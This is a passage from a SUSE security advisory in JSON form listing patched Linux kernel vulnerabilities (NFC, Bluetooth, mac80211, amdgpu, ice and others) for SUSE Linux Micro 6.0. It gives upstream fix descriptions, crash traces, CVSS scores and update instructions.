"summary": "CVE-2026-23146",
"url": "https://www.suse.com/security/cve/CVE-2026-23146"
},
{
"category": "external",
"summary": "SUSE Bug 1258234 for CVE-2026-23146",
"url": "https://bugzilla.suse.com/1258234"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23146"
},
{
"cve": "CVE-2026-23150",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23150"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfc: llcp: Fix memleak in nfc_llcp_send_ui_frame().\n\nsyzbot reported various memory leaks related to NFC, struct\nnfc_llcp_sock, sk_buff, nfc_dev, etc. [0]\n\nThe leading log hinted that nfc_llcp_send_ui_frame() failed\nto allocate skb due to sock_error(sk) being -ENXIO.\n\nENXIO is set by nfc_llcp_socket_release() when struct\nnfc_llcp_local is destroyed by local_cleanup().\n\nThe problem is that there is no synchronisation between\nnfc_llcp_send_ui_frame() and local_cleanup(), and skb\ncould be put into local-\u003etx_queue after it was purged in\nlocal_cleanup():\n\n CPU1 CPU2\n ---- ----\n nfc_llcp_send_ui_frame() local_cleanup()\n |- do { \u0027\n |- pdu = nfc_alloc_send_skb(..., \u0026err)\n | .\n | |- nfc_llcp_socket_release(local, false, ENXIO);\n | |- skb_queue_purge(\u0026local-\u003etx_queue); |\n | \u0027 |\n |- skb_queue_tail(\u0026local-\u003etx_queue, pdu); |\n ... |\n |- pdu = nfc_alloc_send_skb(..., \u0026err) |\n ^._________________________________.\u0027\n\nlocal_cleanup() is called for struct nfc_llcp_local only\nafter nfc_llcp_remove_local() unlinks it from llcp_devices.\n\nIf we hold local-\u003etx_queue.lock then, we can synchronise\nthe thread and nfc_llcp_send_ui_frame().\n\nLet\u0027s do that and check list_empty(\u0026local-\u003elist) before\nqueuing skb to local-\u003etx_queue in nfc_llcp_send_ui_frame().\n\n[0]:\n[ 56.074943][ T6096] llcp: nfc_llcp_send_ui_frame: Could not allocate PDU (error=-6)\n[ 64.318868][ T5813] kmemleak: 6 new suspected memory leaks (see /sys/kernel/debug/kmemleak)\nBUG: memory leak\nunreferenced object 0xffff8881272f6800 (size 1024):\n comm \"syz.0.17\", pid 6096, jiffies 4294942766\n hex dump (first 32 bytes):\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 27 00 03 40 00 00 00 00 00 00 00 00 00 00 00 00 \u0027..@............\n backtrace (crc da58d84d):\n kmemleak_alloc_recursive include/linux/kmemleak.h:44 [inline]\n slab_post_alloc_hook mm/slub.c:4979 [inline]\n slab_alloc_node mm/slub.c:5284 [inline]\n __do_kmalloc_node mm/slub.c:5645 [inline]\n __kmalloc_noprof+0x3e3/0x6b0 mm/slub.c:5658\n kmalloc_noprof include/linux/slab.h:961 [inline]\n sk_prot_alloc+0x11a/0x1b0 net/core/sock.c:2239\n sk_alloc+0x36/0x360 net/core/sock.c:2295\n nfc_llcp_sock_alloc+0x37/0x130 net/nfc/llcp_sock.c:979\n llcp_sock_create+0x71/0xd0 net/nfc/llcp_sock.c:1044\n nfc_sock_create+0xc9/0xf0 net/nfc/af_nfc.c:31\n __sock_create+0x1a9/0x340 net/socket.c:1605\n sock_create net/socket.c:1663 [inline]\n __sys_socket_create net/socket.c:1700 [inline]\n __sys_socket+0xb9/0x1a0 net/socket.c:1747\n __do_sys_socket net/socket.c:1761 [inline]\n __se_sys_socket net/socket.c:1759 [inline]\n __x64_sys_socket+0x1b/0x30 net/socket.c:1759\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xa4/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nBUG: memory leak\nunreferenced object 0xffff88810fbd9800 (size 240):\n comm \"syz.0.17\", pid 6096, jiffies 4294942850\n hex dump (first 32 bytes):\n 68 f0 ff 08 81 88 ff ff 68 f0 ff 08 81 88 ff ff h.......h.......\n 00 00 00 00 00 00 00 00 00 68 2f 27 81 88 ff ff .........h/\u0027....\n backtrace (crc 6cc652b1):\n kmemleak_alloc_recursive include/linux/kmemleak.h:44 [inline]\n slab_post_alloc_hook mm/slub.c:4979 [inline]\n slab_alloc_node mm/slub.c:5284 [inline]\n kmem_cache_alloc_node_noprof+0x36f/0x5e0 mm/slub.c:5336\n __alloc_skb+0x203/0x240 net/core/skbuff.c:660\n alloc_skb include/linux/skbuff.h:1383 [inline]\n alloc_skb_with_frags+0x69/0x3f0 net/core/sk\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23150",
"url": "https://www.suse.com/security/cve/CVE-2026-23150"
},
{
"category": "external",
"summary": "SUSE Bug 1258354 for CVE-2026-23150",
"url": "https://bugzilla.suse.com/1258354"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23150"
},
{
"cve": "CVE-2026-23151",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23151"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: MGMT: Fix memory leak in set_ssp_complete\n\nFix memory leak in set_ssp_complete() where mgmt_pending_cmd structures\nare not freed after being removed from the pending list.\n\nCommit 302a1f674c00 (\"Bluetooth: MGMT: Fix possible UAFs\") replaced\nmgmt_pending_foreach() calls with individual command handling but missed\nadding mgmt_pending_free() calls in both error and success paths of\nset_ssp_complete(). Other completion functions like set_le_complete()\nwere fixed correctly in the same commit.\n\nThis causes a memory leak of the mgmt_pending_cmd structure and its\nassociated parameter data for each SSP command that completes.\n\nAdd the missing mgmt_pending_free(cmd) calls in both code paths to fix\nthe memory leak. Also fix the same issue in set_advertising_complete().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23151",
"url": "https://www.suse.com/security/cve/CVE-2026-23151"
},
{
"category": "external",
"summary": "SUSE Bug 1258237 for CVE-2026-23151",
"url": "https://bugzilla.suse.com/1258237"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23151"
},
{
"cve": "CVE-2026-23152",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23152"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mac80211: correctly decode TTLM with default link map\n\nTID-To-Link Mapping (TTLM) elements do not contain any link mapping\npresence indicator if a default mapping is used and parsing needs to be\nskipped.\n\nNote that access points should not explicitly report an advertised TTLM\nwith a default mapping as that is the implied mapping if the element is\nnot included, this is even the case when switching back to the default\nmapping. However, mac80211 would incorrectly parse the frame and would\nalso read one byte beyond the end of the element.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23152",
"url": "https://www.suse.com/security/cve/CVE-2026-23152"
},
{
"category": "external",
"summary": "SUSE Bug 1258252 for CVE-2026-23152",
"url": "https://bugzilla.suse.com/1258252"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23152"
},
{
"cve": "CVE-2026-23155",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23155"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncan: gs_usb: gs_usb_receive_bulk_callback(): fix error message\n\nSinc commit 79a6d1bfe114 (\"can: gs_usb: gs_usb_receive_bulk_callback():\nunanchor URL on usb_submit_urb() error\") a failing resubmit URB will print\nan info message.\n\nIn the case of a short read where netdev has not yet been assigned,\ninitialize as NULL to avoid dereferencing an undefined value. Also report\nthe error value of the failed resubmit.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23155",
"url": "https://www.suse.com/security/cve/CVE-2026-23155"
},
{
"category": "external",
"summary": "SUSE Bug 1258313 for CVE-2026-23155",
"url": "https://bugzilla.suse.com/1258313"
},
{
"category": "external",
"summary": "SUSE Bug 1258315 for CVE-2026-23155",
"url": "https://bugzilla.suse.com/1258315"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2026-23155"
},
{
"cve": "CVE-2026-23156",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23156"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nefivarfs: fix error propagation in efivar_entry_get()\n\nefivar_entry_get() always returns success even if the underlying\n__efivar_entry_get() fails, masking errors.\n\nThis may result in uninitialized heap memory being copied to userspace\nin the efivarfs_file_read() path.\n\nFix it by returning the error from __efivar_entry_get().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23156",
"url": "https://www.suse.com/security/cve/CVE-2026-23156"
},
{
"category": "external",
"summary": "SUSE Bug 1258317 for CVE-2026-23156",
"url": "https://bugzilla.suse.com/1258317"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23156"
},
{
"cve": "CVE-2026-23163",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23163"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: fix NULL pointer dereference in amdgpu_gmc_filter_faults_remove\n\nOn APUs such as Raven and Renoir (GC 9.1.0, 9.2.2, 9.3.0), the ih1 and\nih2 interrupt ring buffers are not initialized. This is by design, as\nthese secondary IH rings are only available on discrete GPUs. See\nvega10_ih_sw_init() which explicitly skips ih1/ih2 initialization when\nAMD_IS_APU is set.\n\nHowever, amdgpu_gmc_filter_faults_remove() unconditionally uses ih1 to\nget the timestamp of the last interrupt entry. When retry faults are\nenabled on APUs (noretry=0), this function is called from the SVM page\nfault recovery path, resulting in a NULL pointer dereference when\namdgpu_ih_decode_iv_ts_helper() attempts to access ih-\u003ering[].\n\nThe crash manifests as:\n\n BUG: kernel NULL pointer dereference, address: 0000000000000004\n RIP: 0010:amdgpu_ih_decode_iv_ts_helper+0x22/0x40 [amdgpu]\n Call Trace:\n amdgpu_gmc_filter_faults_remove+0x60/0x130 [amdgpu]\n svm_range_restore_pages+0xae5/0x11c0 [amdgpu]\n amdgpu_vm_handle_fault+0xc8/0x340 [amdgpu]\n gmc_v9_0_process_interrupt+0x191/0x220 [amdgpu]\n amdgpu_irq_dispatch+0xed/0x2c0 [amdgpu]\n amdgpu_ih_process+0x84/0x100 [amdgpu]\n\nThis issue was exposed by commit 1446226d32a4 (\"drm/amdgpu: Remove GC HW\nIP 9.3.0 from noretry=1\") which changed the default for Renoir APU from\nnoretry=1 to noretry=0, enabling retry fault handling and thus\nexercising the buggy code path.\n\nFix this by adding a check for ih1.ring_size before attempting to use\nit. Also restore the soft_ih support from commit dd299441654f (\"drm/amdgpu:\nRework retry fault removal\"). This is needed if the hardware doesn\u0027t\nsupport secondary HW IH rings.\n\nv2: additional updates (Alex)\n\n(cherry picked from commit 6ce8d536c80aa1f059e82184f0d1994436b1d526)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23163",
"url": "https://www.suse.com/security/cve/CVE-2026-23163"
},
{
"category": "external",
"summary": "SUSE Bug 1258544 for CVE-2026-23163",
"url": "https://bugzilla.suse.com/1258544"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23163"
},
{
"cve": "CVE-2026-23166",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23166"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: Fix NULL pointer dereference in ice_vsi_set_napi_queues\n\nAdd NULL pointer checks in ice_vsi_set_napi_queues() to prevent crashes\nduring resume from suspend when rings[q_idx]-\u003eq_vector is NULL.\n\nTested adaptor:\n60:00.0 Ethernet controller [0200]: Intel Corporation Ethernet Controller E810-XXV for SFP [8086:159b] (rev 02)\n Subsystem: Intel Corporation Ethernet Network Adapter E810-XXV-2 [8086:4003]\n\nSR-IOV state: both disabled and enabled can reproduce this issue.\n\nkernel version: v6.18\n\nReproduce steps:\nBoot up and execute suspend like systemctl suspend or rtcwake.\n\nLog:\n\u003c1\u003e[ 231.443607] BUG: kernel NULL pointer dereference, address: 0000000000000040\n\u003c1\u003e[ 231.444052] #PF: supervisor read access in kernel mode\n\u003c1\u003e[ 231.444484] #PF: error_code(0x0000) - not-present page\n\u003c6\u003e[ 231.444913] PGD 0 P4D 0\n\u003c4\u003e[ 231.445342] Oops: Oops: 0000 [#1] SMP NOPTI\n\u003c4\u003e[ 231.446635] RIP: 0010:netif_queue_set_napi+0xa/0x170\n\u003c4\u003e[ 231.447067] Code: 31 f6 31 ff c3 cc cc cc cc 0f 1f 80 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f 1f 44 00 00 48 85 c9 74 0b \u003c48\u003e 83 79 30 00 0f 84 39 01 00 00 55 41 89 d1 49 89 f8 89 f2 48 89\n\u003c4\u003e[ 231.447513] RSP: 0018:ffffcc780fc078c0 EFLAGS: 00010202\n\u003c4\u003e[ 231.447961] RAX: ffff8b848ca30400 RBX: ffff8b848caf2028 RCX: 0000000000000010\n\u003c4\u003e[ 231.448443] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff8b848dbd4000\n\u003c4\u003e[ 231.448896] RBP: ffffcc780fc078e8 R08: 0000000000000000 R09: 0000000000000000\n\u003c4\u003e[ 231.449345] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000001\n\u003c4\u003e[ 231.449817] R13: ffff8b848dbd4000 R14: ffff8b84833390c8 R15: 0000000000000000\n\u003c4\u003e[ 231.450265] FS: 00007c7b29e9d740(0000) GS:ffff8b8c068e2000(0000) knlGS:0000000000000000\n\u003c4\u003e[ 231.450715] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n\u003c4\u003e[ 231.451179] CR2: 0000000000000040 CR3: 000000030626f004 CR4: 0000000000f72ef0\n\u003c4\u003e[ 231.451629] PKRU: 55555554\n\u003c4\u003e[ 231.452076] Call Trace:\n\u003c4\u003e[ 231.452549] \u003cTASK\u003e\n\u003c4\u003e[ 231.452996] ? ice_vsi_set_napi_queues+0x4d/0x110 [ice]\n\u003c4\u003e[ 231.453482] ice_resume+0xfd/0x220 [ice]\n\u003c4\u003e[ 231.453977] ? __pfx_pci_pm_resume+0x10/0x10\n\u003c4\u003e[ 231.454425] pci_pm_resume+0x8c/0x140\n\u003c4\u003e[ 231.454872] ? __pfx_pci_pm_resume+0x10/0x10\n\u003c4\u003e[ 231.455347] dpm_run_callback+0x5f/0x160\n\u003c4\u003e[ 231.455796] ? dpm_wait_for_superior+0x107/0x170\n\u003c4\u003e[ 231.456244] device_resume+0x177/0x270\n\u003c4\u003e[ 231.456708] dpm_resume+0x209/0x2f0\n\u003c4\u003e[ 231.457151] dpm_resume_end+0x15/0x30\n\u003c4\u003e[ 231.457596] suspend_devices_and_enter+0x1da/0x2b0\n\u003c4\u003e[ 231.458054] enter_state+0x10e/0x570\n\nAdd defensive checks for both the ring pointer and its q_vector\nbefore dereferencing, allowing the system to resume successfully even when\nq_vectors are unmapped.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23166",
"url": "https://www.suse.com/security/cve/CVE-2026-23166"
},
{
"category": "external",
"summary": "SUSE Bug 1258272 for CVE-2026-23166",
"url": "https://bugzilla.suse.com/1258272"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23166"
},
{
"cve": "CVE-2026-23167",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23167"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfc: nci: Fix race between rfkill and nci_unregister_device().\n\nsyzbot reported the splat below [0] without a repro.\n\nIt indicates that struct nci_dev.cmd_wq had been destroyed before\nnci_close_device() was called via rfkill.\n\nnci_dev.cmd_wq is only destroyed in nci_unregister_device(), which\n(I think) was called from virtual_ncidev_close() when syzbot close()d\nan fd of virtual_ncidev.\n\nThe problem is that nci_unregister_device() destroys nci_dev.cmd_wq\nfirst and then calls nfc_unregister_device(), which removes the\ndevice from rfkill by rfkill_unregister().\n\nSo, the device is still visible via rfkill even after nci_dev.cmd_wq\nis destroyed.\n\nLet\u0027s unregister the device from rfkill first in nci_unregister_device().\n\nNote that we cannot call nfc_unregister_device() before\nnci_close_device() because\n\n 1) nfc_unregister_device() calls device_del() which frees\n all memory allocated by devm_kzalloc() and linked to\n ndev-\u003econn_info_list\n\n 2) nci_rx_work() could try to queue nci_conn_info to\n ndev-\u003econn_info_list which could be leaked\n\nThus, nfc_unregister_device() is split into two functions so we\ncan remove rfkill interfaces only before nci_close_device().\n\n[0]:\nDEBUG_LOCKS_WARN_ON(1)\nWARNING: kernel/locking/lockdep.c:238 at hlock_class kernel/locking/lockdep.c:238 [inline], CPU#0: syz.0.8675/6349\nWARNING: kernel/locking/lockdep.c:238 at check_wait_context kernel/locking/lockdep.c:4854 [inline], CPU#0: syz.0.8675/6349\nWARNING: kernel/locking/lockdep.c:238 at __lock_acquire+0x39d/0x2cf0 kernel/locking/lockdep.c:5187, CPU#0: syz.0.8675/6349\nModules linked in:\nCPU: 0 UID: 0 PID: 6349 Comm: syz.0.8675 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/13/2026\nRIP: 0010:hlock_class kernel/locking/lockdep.c:238 [inline]\nRIP: 0010:check_wait_context kernel/locking/lockdep.c:4854 [inline]\nRIP: 0010:__lock_acquire+0x3a4/0x2cf0 kernel/locking/lockdep.c:5187\nCode: 18 00 4c 8b 74 24 08 75 27 90 e8 17 f2 fc 02 85 c0 74 1c 83 3d 50 e0 4e 0e 00 75 13 48 8d 3d 43 f7 51 0e 48 c7 c6 8b 3a de 8d \u003c67\u003e 48 0f b9 3a 90 31 c0 0f b6 98 c4 00 00 00 41 8b 45 20 25 ff 1f\nRSP: 0018:ffffc9000c767680 EFLAGS: 00010046\nRAX: 0000000000000001 RBX: 0000000000040000 RCX: 0000000000080000\nRDX: ffffc90013080000 RSI: 